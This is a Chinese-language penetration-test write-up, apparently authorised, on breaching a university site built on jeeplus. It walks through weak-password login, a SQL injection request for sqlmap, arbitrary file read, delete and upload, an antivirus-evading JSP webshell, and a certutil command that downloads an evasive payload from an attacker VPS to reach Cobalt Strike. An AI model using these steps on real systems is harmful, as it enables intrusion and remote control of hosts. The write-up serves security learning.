記一次曲折的獲取權限

0x01 前言

碰到了一個對外宣傳是否安全的站點，但實際測試下來并不安全。不過在這次獲取權限的過程中還是有點曲折，記錄下來并分享給大家。

整個測試過程均在授權的情況下完成，漏洞詳細已經提交并通告相關知情。

0x02 過程

1. 進入

https://xxx.edu.cn/a/login，使用弱口令進行登陸

2. 尋找上傳點

進來后找到一處文件上傳的地方進行測試

前端對上傳的文件類型做了初步校驗，這里我們上傳一個空文本后抓包

發現路徑可以被操控，而且返回了絕對路徑。

嘗試訪問后發現不能被解析只能下載。

再次尋找上傳點，發現有頭像上傳的地方。這種上傳點一般都能被解析。

上傳正常圖片

返回了上傳成功的提示，但沒發現返回的地址。

而后在個人資料出發現了圖片地址

我們再次嘗試構造請求報文重發，這里直接將后綴改成 jsp 上傳成功

刷新個人信息，找到訪問鏈接。發現仍然是只能下載。

3. 突破口

我在 Cookie 中發現 jeeplus 的字眼，嘗試搜索 getshell 方法

發現早已有前輩做過代碼審計。

1）SQL注入

/a/sys/register/registerUser?roleName=wangba&mobile=13300990099\*&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on

更具已有的 poc 進行嘗試 sqlmap 跑起來，*號的地方是注入點。

通過 sqlmap 跑出來是 oracle 數據庫。嘗試一些查詢和提權無果放棄。注意，oracle 注入的 sql shell 只能做查詢語句。

2）文件管理

直接訪問 https://xxx.edu.cn/a/sys/file 就能越權進入到文件管理頁面

這個目錄下面的文件都只能下載，我們對這里的文件上傳、刪除、下載都做了測試。

a. 任意文件讀取

下載接口可以返回文件內容，存在任意文件讀取。

b.任意文件刪除

這里甚至可以直接刪除文件夾

c. 任意文件上傳

這里可以自定義上傳路徑，如果路徑不存在則創建目錄并上傳。

3）嘗試上傳文件到可解析目錄

我第一時間想到上傳到 static 目錄，因為這個目錄是可以被直接訪問的。

然后嘗試訪問仍然是 404。

這里就是我沒有找到真確的路徑。想去官網直接下載源碼，點擊下載后回要求注冊，注冊之后也沒有發現哪里有下載源碼的地方。

沒辦法就去凌風云網盤搜了一下，發現存在歷史的版本，我感覺差異應該不會那么大。

挑了一個比較大文件的下載，解壓后可以查看目錄結構。

看到有存放配置文件的地方，我想看看能不能通過讀取配置來找到絕對路徑。

結果還是路徑不對。一番嘗試后無果，突然想起來站點的目錄還沒掃過，直接 dirsearch 來一波。

當我看到掃出來 web.xml 這些配置文件我就知道有戲了。

在 web.xml 中沒有發現東西，但是在 conf/server.xml 發現了站點的另一個路徑，我覺得這就是前端訪問的路徑。

通過任意文件接口嘗試構造路徑 C:\tomcat\webapps\xxxx\WEB-INF\web.xml 發現有內容返回說明我找對了路徑，然后發現了 404.jsp 存放的路徑，對比我們之前拿到的源碼發現我們成功找對了路徑——上傳文件到 webpage 這個目錄絕對能解析。

嘗試直接上傳 webshell。

發現文件真實存在，但是沒有返回東西，我用任意文件讀取查看。

4）免殺繞過WD檢測

發現可能存在waf，但我后面對waf做了識別發現是 apache generic，這個不至于攔截我傳的。再用 nmap 對機器做識別發現是 window10，讓我想起了被 windows Defender支配的恐懼，不過這里我們找個命令免殺馬子上傳即可，找了一番之后用了以前 hw 碰到的一個馬子。

https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/jsp/Runtime-reflect-cmd.jsp

5）上線 CS

成功上傳并執行命令，原本想通過 powershell 上線，但是嘗試過不同的命令包括免殺命令都不行。

然后我通過遠程下載我的免殺馬子上線 CS

certutil -urlcache -split -f http://VPS/免殺馬子.exe

成功上線。

代理出來之后進入桌面，發現果然開啟了 WD

上機之后才知道，原來管理員把上傳文件夾路徑放到F盤，主體是C盤，估計就是怕內存不夠吧。

0x03 總結

碰到沒有思路的站點就做好信息收集擴大攻擊面。指紋識別、端口掃描、路徑掃描都是老生常談的了，這次還結合了公網網盤信息泄露的點，不然我還得繼續猜路徑。還有一點需要注意的是，測試的前提是取得相關授權。

注：如有侵權請聯系刪除